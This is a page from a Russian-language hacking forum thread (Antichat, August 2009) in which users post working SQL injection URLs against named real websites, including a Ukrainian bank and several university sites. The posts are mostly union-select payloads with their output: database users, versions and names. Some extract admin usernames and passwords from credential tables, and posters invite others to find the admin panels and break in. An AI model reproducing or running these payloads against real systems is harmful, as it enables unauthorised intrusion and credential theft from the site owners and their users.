ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10311  
Старый 03.08.2009, 12:19
Аватар для Велемир
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://swedbank.ua/index.php?cat=8&news=2946+and+ascii(substring((use r()),1,1))%3E=1/*

Select фильтрует,вот и забил.
 
Ответить с цитированием

  #10312  
Старый 03.08.2009, 12:36
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

с чайком пойдет))
Цитата:
http://bentley.umich.edu/research/guides/civilwar/civilwar_search.php?nameid=-63'
кол-во 12

Version: 5.0.45-log
User: bentley@dutch.web.itd.umich.edu
Db: bentley
 
Ответить с цитированием

  #10313  
Старый 03.08.2009, 13:37
Аватар для xa-xa89
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
Отправить сообщение для xa-xa89 с помощью ICQ
По умолчанию

Цитата:
http://o33.dk/statsnew/turnering.php?divid=9999+union+select+1,@@version, 3,4+/*+&year=2009
Mysql version: 5.0.32-Debian_7etch10-log
только как то странно он на () реагирует
 
Ответить с цитированием

  #10314  
Старый 03.08.2009, 14:57
Аватар для ILYAtirtir
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

kazan.ru
PR 5
тиц 1700

Цитата:
http://kazan.ru/horo/?zod=12+and+1=2+union+select+1,2,3,concat_ws(0x3a, database(),user(),version())/*&date=0
Код:
newkazan:kazan@localhost:5.0.45-log
 
Ответить с цитированием

  #10315  
Старый 03.08.2009, 15:10
Аватар для nemaniak
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

pfibike.com

Код:
http://www.pfibike.com/dettagli2.php?id=5948'
Код:
http://www.pfibike.com/dettagli2.php?id=5948%27+union+select+1,2,3,4,5,concat_ws(char(58),user(),database(),version()),7,8,9,10,11,12+--+
Код:
pfibike@localhost:pfibikedb:5.0.45-log
Код:
http://www.pfibike.com/dettagli2.php?id=5948%27+union+select+1,2,3,4,5,group_concat(concat_ws(char(58),id,user,passw)),7,8,9,10,11,12+from+admin+--+
админки так и не нашел, если кому повезет, прошу черкнуть в ПМ

laforestadiscoclub.it

Код:
http://www.laforestadiscoclub.it/photo.php?dl_vars[dl_state]=parati&dl_vars[id_tipotenda]=-1+union+select+1,2,3,concat_ws(char(58),user(),database(),version()),5,6+--+
Код:
forest@localhost:forest:5.0.45-log
(вывод в адрес картинки)

elenparati.it

движок такой же как и в прошлом примере, так что запрос аналогичен...

Код:
http://www.elenparati.it/php/index.php?dl_vars[dl_state]=parati&dl_vars[id_tipotenda]=-1+union+select+1,2,3,concat_ws(char(58),user(),database(),version()),5,6+--+
вывод туда же)

Последний раз редактировалось jokester; 03.08.2009 в 15:37.. Причина: Правила темы читаем
 
Ответить с цитированием

  #10316  
Старый 03.08.2009, 17:29
Аватар для xa-xa89
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
Отправить сообщение для xa-xa89 с помощью ICQ
По умолчанию

PR7
EDU
Цитата:
http://www.ithaca.edu/ithacaguide/index.php?action=cat&id=-1+union+select+concat_ws(0x3a,user_username,user_p assword)+FROM+dotproject.users+limit+1,1+--+
MySQL version:5.0.45
Database name:ic
Username:dbadmin@www.ithaca.edu
Замучался нахожу пасс не нахожу для него админки...=(
может кому больше повезет!
 
Ответить с цитированием

  #10317  
Старый 03.08.2009, 18:47
Аватар для mol0t
mol0t
Познающий
Регистрация: 08.07.2009
Сообщений: 43
Провел на форуме:
1369392

Репутация: 262
По умолчанию

Код:
http://buy-dom.ru/pages.php?id=-11+union+select+1,concat_ws(0x3a,database(),version(),user()),3--
kinoplu_buydomru:5.0.81-community:kinoplu_buydomr@localhost



Код:
http://www.kinobel.ru/raduga/announce.php?id=-423+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9,10,11,12--
kinobel_ru:5.0.72:kinobel@127.0.0.1


Код:
http://pro-kharkov.info/pages.php?id=-117&source=3+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8--
PROKHARKOV_MAIN:5.0.51A-COMMUNITY:PROKHARKOV_MAIN@LOCALHOST


Код:
http://www.mag-project.ru/readnews.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9--
b46150:5.0.81:u46150@78.108.84.71


ТИЦ: 70
PR: 5
Код:
http://www.nsj.ru/pages.php?id=-12+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7,8--
nsj_db:4.1.22-log:nsj_mysql@10.1.36.115
 
Ответить с цитированием

  #10318  
Старый 03.08.2009, 20:58
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.mip-pamekasan-gov.com/vpage.php?id=1+and+1=0+union+select+1,concat_ws(0x 3a,user(),database(),version()),3,4,5,6--

h25765_digital@localhost:h25765_mip:5.0.51a-24+lenny1
 
Ответить с цитированием

  #10319  
Старый 03.08.2009, 22:01
Аватар для beerhack
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

PR 5
Код:
http://www.faset.gatech.edu/plugins/content/index.php?id=-50'+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,0,11+from+admin+limit+0,1/*
Database Version: 4.1.22-max
Database name: faset
User name: faset@localhost
 
Ответить с цитированием

  #10320  
Старый 04.08.2009, 12:57
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.amyindia.com/career.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6
Код:
Amyindia_amy@localhost:amyindia_amy:4.1.22-standard
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ